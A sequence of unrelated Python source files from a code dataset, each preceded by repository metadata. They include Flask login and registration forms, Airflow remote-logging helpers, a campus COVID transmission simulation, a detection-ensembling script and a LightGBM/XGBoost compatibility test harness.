assert_equal(len(res_dec["vin"]), 2)
assert(res_dec["vin"][0]["txid"] == watchonly_txid or res_dec["vin"][1]["txid"] == watchonly_txid)
assert_greater_than(result["fee"], 0)
assert_greater_than(result["changepos"], -1)
assert_equal(result["fee"] + res_dec["vout"][result["changepos"]]["value"], watchonly_amount / 10)
signedtx = self.nodes[3].signrawtransaction(result["hex"])
assert(not signedtx["complete"])
signedtx = self.nodes[0].signrawtransaction(signedtx["hex"])
assert(signedtx["complete"])
self.nodes[0].sendrawtransaction(signedtx["hex"])
self.nodes[0].generate(1)
self.sync_all()
#######################
# Test feeRate option #
#######################
# Make sure there is exactly one input so coin selection can't skew the result
assert_equal(len(self.nodes[3].listunspent(1)), 1)
inputs = []
outputs = {self.nodes[2].getnewaddress() : 1}
rawtx = self.nodes[3].createrawtransaction(inputs, outputs)
result = self.nodes[3].fundrawtransaction(rawtx) # uses min_relay_tx_fee (set by settxfee)
result2 = self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 2*min_relay_tx_fee})
result3 = self.nodes[3].fundrawtransaction(rawtx, {"feeRate": 10*min_relay_tx_fee})
result_fee_rate = result['fee'] * 1000 / count_bytes(result['hex'])
assert_fee_amount(result2['fee'], count_bytes(result2['hex']), 2 * result_fee_rate)
assert_fee_amount(result3['fee'], count_bytes(result3['hex']), 10 * result_fee_rate)
# Standard functional-test entry point: instantiate the test case and run it
# (main() spins up the regtest nodes, calls run_test, then tears down).
if __name__ == '__main__':
    RawTransactionsTest().main()
| 42.712782 | 223 | 0.562315 |
f5ea4e6cb8675d94cfd4c6ca42e0d7e78759287e | 1,468 | py | Python | app/auth/forms.py | mikescor/login-service | de64f66c4d79435645f5022fbb39aefd72467622 | [
"MIT"
] | null | null | null | app/auth/forms.py | mikescor/login-service | de64f66c4d79435645f5022fbb39aefd72467622 | [
"MIT"
] | null | null | null | app/auth/forms.py | mikescor/login-service | de64f66c4d79435645f5022fbb39aefd72467622 | [
"MIT"
] | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField, \
TextAreaField
from wtforms.validators import DataRequired, ValidationError, Email, EqualTo, \
Length
from app.models import User
class LoginForm(FlaskForm):
    """Sign-in form: username/password credentials plus a remember-me flag."""

    username = StringField('Username', validators=[DataRequired()])
    password = PasswordField('Password', validators=[DataRequired()])
    # When checked, the session cookie outlives the browser session.
    remember_me = BooleanField('Remember Me')
    submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
    """New-account form; enforces unique username/e-mail against the DB."""

    username = StringField('Username', validators=[DataRequired()])
    email = StringField('Email', validators=[DataRequired(), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    # EqualTo rejects the submission unless both password entries match.
    password2 = PasswordField(
        'Repeat Password', validators=[DataRequired(), EqualTo('password')])
    submit = SubmitField('Register')

    def validate_username(self, username):
        """WTForms inline validator: reject usernames already registered."""
        user = User.query.filter_by(username=username.data).first()
        if user is not None:
            raise ValidationError('Please use a different username')

    def validate_email(self, email):
        """WTForms inline validator: reject e-mail addresses already registered."""
        user = User.query.filter_by(email=email.data).first()
        if user is not None:
            raise ValidationError('Please use a different email address')
class PostForm(FlaskForm):
    """Free-text post form; body limited to 1-140 characters."""

    post = TextAreaField('Say something', validators=[
        DataRequired(), Length(min=1, max=140)])
    submit = SubmitField('Submit')
6e18e52d007c7fe8365acf2062a7072ef9f711b5 | 10,090 | py | Python | airflow/utils/logging.py | beattymg/airflow | 859952cfbdeb45368c6a09d0be51d05302d2f0b6 | [
"MIT",
"BSD-3-Clause",
"BSD-2-Clause",
"Apache-2.0"
] | 6 | 2016-04-20T20:40:43.000Z | 2022-02-20T10:32:00.000Z | airflow/utils/logging.py | beattymg/airflow | 859952cfbdeb45368c6a09d0be51d05302d2f0b6 | [
"MIT",
"BSD-3-Clause",
"BSD-2-Clause",
"Apache-2.0"
] | 8 | 2017-09-07T22:20:35.000Z | 2021-05-14T17:35:27.000Z | airflow/utils/logging.py | beattymg/airflow | 859952cfbdeb45368c6a09d0be51d05302d2f0b6 | [
"MIT",
"BSD-3-Clause",
"BSD-2-Clause",
"Apache-2.0"
] | 8 | 2016-04-13T21:22:46.000Z | 2020-07-31T18:31:59.000Z | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import object
import dateutil.parser
import logging
import six
from airflow import configuration
from airflow.exceptions import AirflowException
class LoggingMixin(object):
    """Mixin that lazily provides a per-class child logger.

    The logger is named ``<module>.<ClassName>``, created on first access
    and cached on the instance for all subsequent lookups.
    """

    @property
    def logger(self):
        if not hasattr(self, '_logger'):
            cls = self.__class__
            qualified_name = cls.__module__ + '.' + cls.__name__
            self._logger = logging.root.getChild(qualified_name)
        return self._logger
class S3Log(object):
    """
    Utility class for reading and writing logs in S3.

    Requires airflow[s3] and setting the REMOTE_BASE_LOG_FOLDER and
    REMOTE_LOG_CONN_ID configuration options in airflow.cfg.

    Remote failures are deliberately swallowed (logged at most): log
    shipping must never take down the task that produced the logs.
    """

    def __init__(self):
        remote_conn_id = configuration.get('core', 'REMOTE_LOG_CONN_ID')
        try:
            from airflow.hooks.S3_hook import S3Hook
            self.hook = S3Hook(remote_conn_id)
        # Fix: catch Exception instead of a bare except so SystemExit and
        # KeyboardInterrupt still propagate; any other failure just
        # disables remote logging.
        except Exception:
            self.hook = None
            logging.error(
                'Could not create an S3Hook with connection id "{}". '
                'Please make sure that airflow[s3] is installed and '
                'the S3 connection exists.'.format(remote_conn_id))

    def log_exists(self, remote_log_location):
        """
        Check if remote_log_location exists in remote storage

        :param remote_log_location: log's location in remote storage
        :return: True if location exists else False
        """
        if self.hook:
            try:
                return self.hook.get_key(remote_log_location) is not None
            except Exception:
                pass
        return False

    def read(self, remote_log_location, return_error=False):
        """
        Returns the log found at the remote_log_location. Returns '' if no
        logs are found or there is an error.

        :param remote_log_location: the log's location in remote storage
        :type remote_log_location: string (path)
        :param return_error: if True, returns a string error message if an
            error occurs. Otherwise returns '' when an error occurs.
        :type return_error: bool
        """
        if self.hook:
            try:
                s3_key = self.hook.get_key(remote_log_location)
                if s3_key:
                    return s3_key.get_contents_as_string().decode()
            except Exception:
                pass

        # return error if needed
        if return_error:
            msg = 'Could not read logs from {}'.format(remote_log_location)
            logging.error(msg)
            return msg

        return ''

    def write(self, log, remote_log_location, append=True):
        """
        Writes the log to the remote_log_location. Fails silently if no hook
        was created.

        :param log: the log to write to the remote_log_location
        :type log: string
        :param remote_log_location: the log's location in remote storage
        :type remote_log_location: string (path)
        :param append: if False, any existing log file is overwritten. If True,
            the new log is appended to any existing logs.
        :type append: bool
        """
        if self.hook:
            if append:
                # Read-modify-write: S3 objects cannot be appended in place.
                old_log = self.read(remote_log_location)
                log = '\n'.join([old_log, log])
            try:
                self.hook.load_string(
                    log,
                    key=remote_log_location,
                    replace=True,
                    encrypt=configuration.getboolean('core', 'ENCRYPT_S3_LOGS'),
                )
            except Exception:
                logging.error('Could not write logs to {}'.format(remote_log_location))
class GCSLog(object):
    """
    Utility class for reading and writing logs in GCS. Requires
    airflow[gcp_api] and setting the REMOTE_BASE_LOG_FOLDER and
    REMOTE_LOG_CONN_ID configuration options in airflow.cfg.

    As with S3Log, remote failures are swallowed (logged at most) so that
    log shipping can never break the task that produced the logs.
    """

    def __init__(self):
        """
        Attempt to create hook with airflow[gcp_api].
        """
        remote_conn_id = configuration.get('core', 'REMOTE_LOG_CONN_ID')
        self.hook = None

        try:
            from airflow.contrib.hooks.gcs_hook import GoogleCloudStorageHook
            self.hook = GoogleCloudStorageHook(
                google_cloud_storage_conn_id=remote_conn_id)
        # Fix: catch Exception instead of a bare except so SystemExit and
        # KeyboardInterrupt still propagate.
        except Exception:
            logging.error(
                'Could not create a GoogleCloudStorageHook with connection id '
                '"{}". Please make sure that airflow[gcp_api] is installed '
                'and the GCS connection exists.'.format(remote_conn_id))

    def log_exists(self, remote_log_location):
        """
        Check if remote_log_location exists in remote storage

        :param remote_log_location: log's location in remote storage
        :return: True if location exists else False
        """
        if self.hook:
            try:
                bkt, blob = self.parse_gcs_url(remote_log_location)
                return self.hook.exists(bkt, blob)
            except Exception:
                pass
        return False

    def read(self, remote_log_location, return_error=False):
        """
        Returns the log found at the remote_log_location.

        :param remote_log_location: the log's location in remote storage
        :type remote_log_location: string (path)
        :param return_error: if True, returns a string error message if an
            error occurs. Otherwise returns '' when an error occurs.
        :type return_error: bool
        """
        if self.hook:
            try:
                bkt, blob = self.parse_gcs_url(remote_log_location)
                return self.hook.download(bkt, blob).decode()
            except Exception:
                pass

        # return error if needed
        if return_error:
            msg = 'Could not read logs from {}'.format(remote_log_location)
            logging.error(msg)
            return msg

        return ''

    def write(self, log, remote_log_location, append=True):
        """
        Writes the log to the remote_log_location. Fails silently if no hook
        was created.

        :param log: the log to write to the remote_log_location
        :type log: string
        :param remote_log_location: the log's location in remote storage
        :type remote_log_location: string (path)
        :param append: if False, any existing log file is overwritten. If True,
            the new log is appended to any existing logs.
        :type append: bool
        """
        if self.hook:
            if append:
                old_log = self.read(remote_log_location)
                log = '\n'.join([old_log, log])
            try:
                bkt, blob = self.parse_gcs_url(remote_log_location)
                from tempfile import NamedTemporaryFile
                with NamedTemporaryFile(mode='w+') as tmpfile:
                    tmpfile.write(log)
                    # Force the file to be flushed, since we're doing the
                    # upload from within the file context (it hasn't been
                    # closed).
                    tmpfile.flush()
                    self.hook.upload(bkt, blob, tmpfile.name)
            except Exception:
                logging.error('Could not write logs to {}'.format(remote_log_location))

    def parse_gcs_url(self, gsurl):
        """
        Given a Google Cloud Storage URL (gs://<bucket>/<blob>), returns a
        tuple containing the corresponding bucket and blob.

        :raises AirflowException: if the URL has no bucket (netloc) component
        """
        # Python 3
        try:
            from urllib.parse import urlparse
        # Python 2
        except ImportError:
            from urlparse import urlparse

        parsed_url = urlparse(gsurl)
        if not parsed_url.netloc:
            raise AirflowException('Please provide a bucket name')
        else:
            bucket = parsed_url.netloc
            blob = parsed_url.path.strip('/')
            return (bucket, blob)
# TODO: get_log_filename and get_log_directory are temporary helper
# functions to get airflow log filename. Logic of using FileHandler
# will be extract out and those two functions will be moved.
# For more details, please check issue AIRFLOW-1385.
def get_log_filename(dag_id, task_id, execution_date, try_number):
    """
    Return the relative log file path for one attempt of a task instance.

    :arg dag_id: id of the dag
    :arg task_id: id of the task
    :arg execution_date: execution date of the task instance
    :arg try_number: try_number of current task instance
    """
    # For reporting purposes and keeping logs consistent with web UI
    # display, we report based on 1-indexed, not 0-indexed lists
    display_attempt = try_number + 1
    log_dir = get_log_directory(dag_id, task_id, execution_date)
    return "{}/{}.log".format(log_dir, display_attempt)
def get_log_directory(dag_id, task_id, execution_date):
    """
    Return the relative log directory path: dag_id/task_id/execution_date.

    :arg dag_id: id of the dag
    :arg task_id: id of the task
    :arg execution_date: execution date of the task instance; either a
        datetime or an ISO-formatted (unicode) string, which is parsed first
    """
    # execution_date may arrive serialized as a (unicode) string instead of
    # a datetime object; normalize it before formatting.
    parsed_date = execution_date
    if isinstance(parsed_date, six.string_types):
        parsed_date = dateutil.parser.parse(parsed_date)
    return '{}/{}/{}'.format(dag_id, task_id, parsed_date.isoformat())
| 36.035714 | 107 | 0.625273 |
116fa9b1d06eda895a6c64059bddfe9d1fa672f2 | 6,493 | py | Python | beta003_noNPI_vax_locom.py | onnela-lab/covid-campus | fe8b5e8c8882c079db426584a531eb00ef9b1709 | [
"BSD-3-Clause"
] | null | null | null | beta003_noNPI_vax_locom.py | onnela-lab/covid-campus | fe8b5e8c8882c079db426584a531eb00ef9b1709 | [
"BSD-3-Clause"
] | null | null | null | beta003_noNPI_vax_locom.py | onnela-lab/covid-campus | fe8b5e8c8882c079db426584a531eb00ef9b1709 | [
"BSD-3-Clause"
] | 1 | 2021-08-02T19:08:30.000Z | 2021-08-02T19:08:30.000Z | """
Author: Hali Hambridge
This code was run in parallel on a computing cluster using the following bash command:
python beta003_noNPI_vax_locom.py $SLURM_ARRAY_TASK_ID
Dependencies: pandas, networkx, numpy, matplotlib, itertools, time
-------------------
Parameter Settings
-------------------
Transmission probability (beta) = 0.003078 per 5 minute exposure, roughly R0 ~ 1.5
Testing Frequencies: every 3, 7, 14, 28 days and symptomatic only
Proportion Vaccinated: 0%, 20%, 40%, 60%, 80%
Probability of External Infection: iid normal(loc = 0.0005, scale = 0.0001),
roughly 0.3 people infected by outside source each day in a fully susceptible population,
corresponds to low community transmission scenario in paper
Proportion Mask Wearing: 0%
Proportion Social Distancing: 0%
-------------------
File Outputs
-------------------
beta003_noNPI_vax_locom_detailed_0.csv
beta003_noNPI_vax_locom_detailed_1.csv
beta003_noNPI_vax_locom_detailed_2.csv
beta003_noNPI_vax_locom_detailed_3.csv
beta003_noNPI_vax_locom_detailed_4.csv
"""
import os
import sys
import pandas as pd
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
import itertools
import time
from testing_freq import *
from utils import *
# Parse command line arguments
# (the SLURM array task id selects an independent seed stream per job)
TASKID = int(sys.argv[1])
myseed = TASKID*50000
print('TASKID: ', TASKID)
print('myseed: ', myseed)

sim_name = 'beta003_noNPI_vax_locom'
test_freqs = [0, 3, 7, 14, 28]  # 0 means symptomatic-only testing
time_step = 86400 # one day
nreps = 20  # simulation replicates per (vaccination, test-frequency) cell

# Read Copenhagen Network Study data
bt = pd.read_csv('bt_data_clean.csv', header = 0, names = ['timestamp','user_a', 'user_b', 'rssi'])

# Construct adjacency matrices
adj_mats, df = construct_adj_mat(bt, time_step = time_step, data_loops = 3, dist_thres = -75)

# Set parameters for simulations
disease_params = dict()
disease_params['asymp'] = 0.3 # 30% remain symptom free for the duration, other pre-symptomatic
disease_params['beta'] = gen_trans_prob(n_nodes = adj_mats.shape[1], univ_val = 0.003078) # Roughly corresponds to R0 = 1.5
disease_params['sigma_a'] = 1/3 # average incubation period is 3 days
disease_params['sigma_s'] = 1/3
disease_params['gamma_a'] = 1/7 # mild to moderate infectious no longer than 10 days (per CDC)
disease_params['gamma_s'] = 1/12 # severe illness infectious no longer than 20 days after symptom onset
disease_params['n_time_day'] = 1

test_params = dict()
test_params['spec'] = 0.99  # test specificity
test_params['symp_test_delay'] = gen_symp_test_delay(n_nodes = adj_mats.shape[1], univ_delay = 3)
test_params['time_dep'] = True
test_params['time_dep_type'] = 'W'
# % of people seeking testing at each time step, even though not sick -- this is about 3 people per day
test_params['false_symp'] = 0.005

quar_params = dict()
quar_params['quar_delay'] = gen_quar_delay(n_nodes = adj_mats.shape[1], univ_delay = 1)
quar_params['quar_len'] = 10 # 10 day quarantine

# Create the beta scenarios
vax_props = np.linspace(0, 0.8, 5)
beta_scenarios = list(vax_props)

# Create empty df for output
df_out = pd.DataFrame()

# Create empty df for detailed output
det_df_out = pd.DataFrame()

# Loop through each of the beta scenarios
for scenario in beta_scenarios:
    p_vax = scenario

    """
    RUN SIMULATION FOR TESTING SCENARIOS
    """
    # Loop through each of the testing frequencies to consider
    for tf in test_freqs:
        # Set the testing frequency
        test_params['test_freq'] = tf

        # Run simulation with testing and isolation
        for i in range(nreps):
            # Set the parameters that are probabilistic
            # (each replicate gets its own seed; negative draws are rejected
            # and resampled since probabilities cannot be < 0)
            rs = np.random.RandomState(myseed)
            disease_params['ext_inf'] = rs.normal(loc = 0.0005, scale = 0.0001, size = 1) # about 0.3 people infected by outside source each day in a fully susceptible population
            while disease_params['ext_inf']<0:
                disease_params['ext_inf'] = rs.normal(loc = 0.0005, scale = 0.0001, size = 1)
            # Vaccinated individuals are modeled as initially "recovered".
            disease_params['init_status'] = gen_init_status(n_nodes = adj_mats.shape[1], asymp = disease_params['asymp'], n_init_inf = 1, n_init_rec = int(adj_mats.shape[1]*p_vax), seed = myseed)
            test_params['nc_schd'] = rs.normal(loc = 0.025, scale = 0.01, size = 1) # Percent non-compliant with scheduled testing
            while test_params['nc_schd']<0:
                test_params['nc_schd'] = rs.normal(loc = 0.025, scale = 0.01, size = 1) # Percent non-compliant with scheduled testing
            test_params['nc_symp'] = rs.normal(loc = 0.25, scale = 0.1, size = 1) # Percent non-compliant with symptomatic testing
            while test_params['nc_symp']<0:
                test_params['nc_symp'] = rs.normal(loc = 0.25, scale = 0.1, size = 1) # Percent non-compliant with symptomatic testing
            quar_params['quar_comp'] = gen_quar_comp(n_nodes = adj_mats.shape[1], seed = myseed)

            # Instantiate the simulation class
            testin = TestFreq(adj_mats, disease_params, test_params, quar_params)

            # Run the simulation
            (ia_nodes_byt, is_nodes_byt, test_pos_schd_byt, test_pos_symp_byt, q_schd_byt, q_symp_byt) = testin.sim_spread_test(seed = myseed)

            # Save detailed results (one row per time step)
            tmpdf = pd.DataFrame.from_dict({'rep': np.repeat(i+1, repeats = len(ia_nodes_byt)), 'p_vax': np.repeat(p_vax, repeats = len(ia_nodes_byt)),
                                            'tstep': list(range(len(ia_nodes_byt))), 'ext_inf_ct': np.repeat(testin.ext_ict, repeats = len(ia_nodes_byt)),
                                            'test_freq': np.repeat(tf, repeats = len(ia_nodes_byt)),
                                            'ia_nodes': ia_nodes_byt, 'is_nodes': is_nodes_byt, 'test_pos_schd': test_pos_schd_byt, 'test_pos_symp': test_pos_symp_byt,
                                            'q_schd': q_schd_byt, 'q_symp': q_symp_byt})
            det_df_out = det_df_out.append(tmpdf, ignore_index = True)

            # Save aggregate results
            # Flatten the results
            flat_ia = [x for l in ia_nodes_byt for x in l]
            flat_is = [x for l in is_nodes_byt for x in l]

            # Save the results (cumulative count of unique infected nodes)
            tmpdf = pd.DataFrame.from_dict({'rep': [i+1], 'test_freq': [tf], 'p_vax': [p_vax], 'cum_uniq_inf': [len(set(flat_ia + flat_is))]})
            df_out = df_out.append(tmpdf, ignore_index = True)

            # Update the seed
            myseed +=1

# Save out the pandas dataframe results
df_out.to_csv(sim_name + '_' + str(TASKID) + '.csv', index = False)
det_df_out.to_csv(sim_name + '_detailed_' + str(TASKID) + '.csv', index = False)
| 43 | 195 | 0.684583 |
93a4ea1f8a22e49332e64ce64bfad03dd93e2f3a | 5,930 | py | Python | ensemble_COCO_kvasir.py | GorkemP/EndoCV2021-EfficientDet-Pytorch | 2ca3140d50a07e503850cad101deb0887eace9c7 | [
"MIT"
] | 4 | 2021-05-29T19:02:19.000Z | 2021-12-17T13:53:45.000Z | ensemble_COCO_kvasir.py | GorkemP/EndoCV2021-EfficientDet-Pytorch | 2ca3140d50a07e503850cad101deb0887eace9c7 | [
"MIT"
] | null | null | null | ensemble_COCO_kvasir.py | GorkemP/EndoCV2021-EfficientDet-Pytorch | 2ca3140d50a07e503850cad101deb0887eace9c7 | [
"MIT"
] | null | null | null | # Created by Gorkem Polat at 14.03.2021
# contact: polatgorkem@gmail.com
import glob
import os
import json
import shutil
from ensemble_boxes import *
import argparse
import time
# parser = argparse.ArgumentParser(description='EndoCV2021: inference on test set, by Ece Isik Polat')
# parser.add_argument("-it", "--iou_threshold", type=float, default=0.3)
# args = parser.parse_args()
# --- Fusion configuration -------------------------------------------------
# One weight per model output file (all four models contribute equally).
weights = [1, 1, 1, 1]
# iou_thr = args.iou_threshold
# IoU threshold used by weighted-boxes-fusion to cluster overlapping boxes.
iou_thr = 0.5 # Be careful on here! normal = 0.4
# Boxes with scores below this threshold are dropped before fusion.
skip_box_thr = 0.0001

# Previously used input/output configurations, kept for reference:
# predicted_path_list = ["test_kvasir_bbox_results_0.json",
# "test_kvasir_bbox_results_1.json",
# "test_kvasir_bbox_results_2.json",
# "test_kvasir_bbox_results_3.json"]
# ground_truth_path = '/home/ws2080/Desktop/data/EndoCV2021/edited_files/paper/Kvasir-SEG/kvasir_seg_COCO.json'
# target_file = "ensemble_kvasir.json"

# predicted_path_list = ["test_kvasir_mini_test_bbox_results_0.json",
# "test_kvasir_mini_test_bbox_results_1.json",
# "test_kvasir_mini_test_bbox_results_2.json",
# "test_kvasir_mini_test_bbox_results_3.json"]
# ground_truth_path = '/home/ws2080/Desktop/data/EndoCV2021/edited_files/paper/Kvasir-SEG/kvasir_seg_test_COCO.json'
# target_file = "ensemble_kvasir_test.json"

# Active configuration: per-model COCO-style detection dumps, the matching
# ground-truth annotation file, and where the fused result is written.
predicted_path_list = ["test_kvasir_model_on_endocv_center_bbox_results_0.json",
                       "test_kvasir_model_on_endocv_center_bbox_results_1.json",
                       "test_kvasir_model_on_endocv_center_bbox_results_2.json",
                       "test_kvasir_model_on_endocv_center_bbox_results_3.json"]
ground_truth_path = 'datasets/polyps_all_centers/annotations/instances_test.json'
target_file = "ensemble_kvasir_on_endocv_center.json"
def calculate_normalized_voc_given_json_path(predicted_path, ground_truth_path):
    """
    Load COCO-style detections and annotate each with VOC and normalized boxes.

    Each detection dict gains a "voc" key ([x1, y1, x2, y2], clipped to the
    image bounds) and a "normalized" key (the same corners divided by image
    width/height). Detections whose box has no positive area inside the image
    are filtered out.

    :param predicted_path: JSON file with a list of COCO detections
        ({"image_id", "bbox" [x, y, w, h], "score", ...})
    :param ground_truth_path: COCO annotation JSON providing image sizes
    :return: list of the surviving (mutated) detection dicts, in input order
    """
    # Fix: use context managers so both file handles are closed (the
    # original leaked the descriptors of both files).
    with open(predicted_path) as pred_file:
        detections = json.load(pred_file)
    with open(ground_truth_path) as gt_file:
        originals = json.load(gt_file)

    valid_detections = []
    for det in detections:
        image_id = det["image_id"]
        # NOTE(review): this indexes originals["images"] by position, i.e. it
        # assumes the entry at index image_id has id == image_id — confirm
        # against how the ground-truth COCO file is generated.
        image_width = originals["images"][image_id]["width"]
        image_height = originals["images"][image_id]["height"]

        x1, y1, w, h = det["bbox"][:4]
        # Clip the bottom-right corner to the image bounds.
        x2 = min(x1 + w, image_width)
        y2 = min(y1 + h, image_height)

        det["voc"] = [x1, y1, x2, y2]
        det["normalized"] = [x1 / image_width, y1 / image_height,
                             x2 / image_width, y2 / image_height]

        # Keep only boxes with positive area whose top-left corner lies
        # inside the image.
        if x1 < image_width and y1 < image_height and y2 > y1 and x2 > x1:
            valid_detections.append(det)
    return valid_detections
def get_original_images_id_list(ground_truth_path):
    """
    Return the ids of all images listed in a COCO ground-truth file.

    :param ground_truth_path: path to a COCO-format annotation JSON
    :return: list of the "id" field of every entry in "images", in file order
    """
    # Fix: context manager closes the file handle (the original leaked it).
    with open(ground_truth_path) as gt_file:
        gt = json.load(gt_file)
    return [image["id"] for image in gt["images"]]
# Module-level driver state. `original_images_ids` is computed here but not
# read again below (get_enseble_results recomputes it); `total_elapsed`
# accumulates fusion wall-clock time inside get_enseble_results.
original_images_ids = get_original_images_id_list(ground_truth_path)

total_elapsed = 0
def get_enseble_results(predicted_path_list, ground_truth_path):
    """
    Fuse per-model detections with weighted-boxes-fusion and write the
    combined COCO-style result list to ``target_file``.

    Uses the module-level ``weights``, ``iou_thr``, ``skip_box_thr`` and
    ``target_file`` settings, and accumulates fusion wall-clock time into
    the global ``total_elapsed``.

    :param predicted_path_list: one detection JSON per ensemble member
    :param ground_truth_path: COCO annotation JSON (image ids and sizes)
    """
    global total_elapsed
    f_gt = open(ground_truth_path)
    gt_dict = json.load(f_gt)
    original_images_id_list = get_original_images_id_list(ground_truth_path)
    fusion_dict = []
    for image_id in original_images_id_list:
        # Per-image inputs to weighted_boxes_fusion: one sub-list per model.
        boxes_list = []
        scores_list = []
        labels_list = []
        for json_path in predicted_path_list:
            start = time.time()
            # NOTE(review): every prediction file is re-parsed for every
            # image — hoisting this out of the image loop would be far
            # faster; confirm before changing, since the timing below
            # depends on where this runs.
            json_dict = calculate_normalized_voc_given_json_path(json_path, ground_truth_path)
            image_annotations = [x for x in json_dict if x["image_id"] == image_id]
            bb = []
            scr = []
            lbl = []
            for ann in image_annotations:
                # Sanity check: warn about normalized coords outside [0, 1].
                for j in range(4):
                    if (ann["normalized"][j] < 0):
                        print(json_path, ann["id"], image_id, ann["normalized"][j])
                    if (ann["normalized"][j] > 1):
                        print(json_path, ann["id"], image_id, ann["normalized"][j])
                bb.append(ann["normalized"])
                scr.append(ann["score"])
                lbl.append(1)  # single-class task: every detection is a polyp
            boxes_list.append(bb)
            scores_list.append(scr)
            labels_list.append(lbl)
        boxes, scores, labels = weighted_boxes_fusion(boxes_list, scores_list, labels_list, weights=weights,
                                                      iou_thr=iou_thr, skip_box_thr=skip_box_thr)
        end = time.time()
        # NOTE(review): `start` is (re)set inside the model loop, so this
        # measures only the last model's parse plus the fusion call.
        total_elapsed += (end - start)
        # NOTE(review): positional indexing assumes images[i]["id"] == i —
        # same assumption as calculate_normalized_voc_given_json_path.
        image_width = gt_dict["images"][image_id]["width"]
        image_height = gt_dict["images"][image_id]["height"]
        annotation_counter = 0
        for i in range(len(scores)):
            # Convert fused normalized corners back to absolute COCO xywh.
            x1 = int(boxes[i, 0] * image_width)
            y1 = int(boxes[i, 1] * image_height)
            x2 = int(boxes[i, 2] * image_width)
            y2 = int(boxes[i, 3] * image_height)
            object_width = x2 - x1
            object_height = y2 - y1
            annotation_dict = {}
            annotation_dict["image_id"] = image_id
            annotation_dict["category_id"] = 1
            annotation_dict["score"] = scores[i].astype(float)
            annotation_dict["bbox"] = [x1, y1, object_width, object_height]
            fusion_dict.append(annotation_dict)
            annotation_counter += 1
    with open(target_file, "w") as outfile:
        json.dump(fusion_dict, outfile)
# Run the ensemble over all model outputs and report the accumulated
# fusion timing (total, and divided by 1000 — presumably a per-image
# average; TODO confirm the test-set size).
get_enseble_results(predicted_path_list, ground_truth_path)
print(total_elapsed)
print(total_elapsed / 1000)
| 35.722892 | 116 | 0.63339 |
c559c89dabb3d7e0e5cf86989eece9dff6ef9022 | 6,116 | py | Python | testscripts/compatibility_cases.py | lotuski/leaves | bdf4ddb48520a487e2b1d9953b622260e0d2d414 | [
"MIT"
] | 334 | 2018-09-16T09:33:49.000Z | 2022-03-21T21:00:07.000Z | testscripts/compatibility_cases.py | lotuski/leaves | bdf4ddb48520a487e2b1d9953b622260e0d2d414 | [
"MIT"
] | 76 | 2018-09-15T17:38:40.000Z | 2022-03-31T14:23:44.000Z | testscripts/compatibility_cases.py | lotuski/leaves | bdf4ddb48520a487e2b1d9953b622260e0d2d414 | [
"MIT"
] | 62 | 2018-09-18T08:53:30.000Z | 2022-02-28T22:58:31.000Z | from string import Template
from compatibility_core import Case, LibraryType
# LightGBM releases exercised by the compatibility test matrix (newest first).
LIGHTGBM_VERSIONS = [
    '2.3.0',
    '2.2.3',
    '2.2.2',
    '2.2.1',
    '2.2.0',
    '2.1.2',
    '2.1.1',
    '2.1.0',
    '2.0.12',
    '2.0.11',
    '2.0.10',
]

# XGBoost releases exercised by the compatibility test matrix (newest first).
XGBOOST_VERSIONS = [
    '0.90',
    '0.82',
    '0.72.1',
]
class BaseCase(Case):
    """Common scaffolding for library-compatibility cases.

    Subclasses supply `python_template` (a program that trains a model and
    dumps test data plus reference predictions) and `go_template` (a program
    that re-loads the model with leaves and writes its own predictions);
    `compare` then checks the two prediction files agree.
    """

    # File names shared between the generated Python and Go programs.
    files = dict(
        model_filename='model.txt',
        true_predictions_filename='true_predictions.txt',
        predictions_filename='predictions.txt',
        data_filename='data.txt',
    )
    # string.Template objects; must be overridden by subclasses.
    python_template=None
    go_template=None

    def compare(self):
        """Assert the Go predictions match the Python reference predictions."""
        self.compare_matrices(
            matrix1_filename=self.files['true_predictions_filename'],
            matrix2_filename=self.files['predictions_filename'],
            tolerance=1e-10,
            max_number_of_mismatches_ratio=0.0
        )

    def go_code(self):
        """Return Go source for this case with the shared file names substituted."""
        return self.go_template.substitute(self.files)

    def python_code(self):
        """Return Python source for this case with the shared file names substituted."""
        return self.python_template.substitute(self.files)
class LGBaseCase(BaseCase):
    """Base for cases run against every supported LightGBM version."""
    library = LibraryType.LIGHTGBM
    versions = LIGHTGBM_VERSIONS
class XGBaseCase(BaseCase):
    """Base for cases run against every supported XGBoost version."""
    library = LibraryType.XGBOOST
    versions = XGBOOST_VERSIONS
class LGBreastCancer(LGBaseCase):
    """LightGBM gbdt binary classifier on sklearn's breast-cancer dataset.

    Python trains the model, saves it in txt format and dumps raw-score
    predictions; Go reads the dense TSV test matrix and must reproduce them.
    """
    python_template = Template("""
import lightgbm as lgb
import numpy as np
from sklearn import datasets
from sklearn.model_selection import train_test_split

X, y = datasets.load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)

n_estimators = 30
d_train = lgb.Dataset(X_train, label=y_train)
params = {
    'boosting_type': 'gbdt',
    'objective': 'binary',
}
clf = lgb.train(params, d_train, n_estimators)
y_pred = clf.predict(X_test, raw_score=True)
clf.save_model('$model_filename')  # save the model in txt format
np.savetxt('$true_predictions_filename', y_pred)
np.savetxt('$data_filename', X_test, delimiter='\t')
""")

    go_template = Template("""
package main

import (
	"github.com/dmitryikh/leaves"
	"github.com/dmitryikh/leaves/mat"
)

func main() {
	test, err := mat.DenseMatFromCsvFile("$data_filename", 0, false, "\t", 0.0)
	if err != nil {
		panic(err)
	}
	model, err := leaves.LGEnsembleFromFile("$model_filename", false)
	if err != nil {
		panic(err)
	}
	predictions := mat.DenseMatZero(test.Rows, model.NOutputGroups())
	err = model.PredictDense(test.Values, test.Rows, test.Cols, predictions.Values, 0, 1)
	if err != nil {
		panic(err)
	}
	err = predictions.ToCsvFile("$predictions_filename", "\t")
	if err != nil {
		panic(err)
	}
}
""")
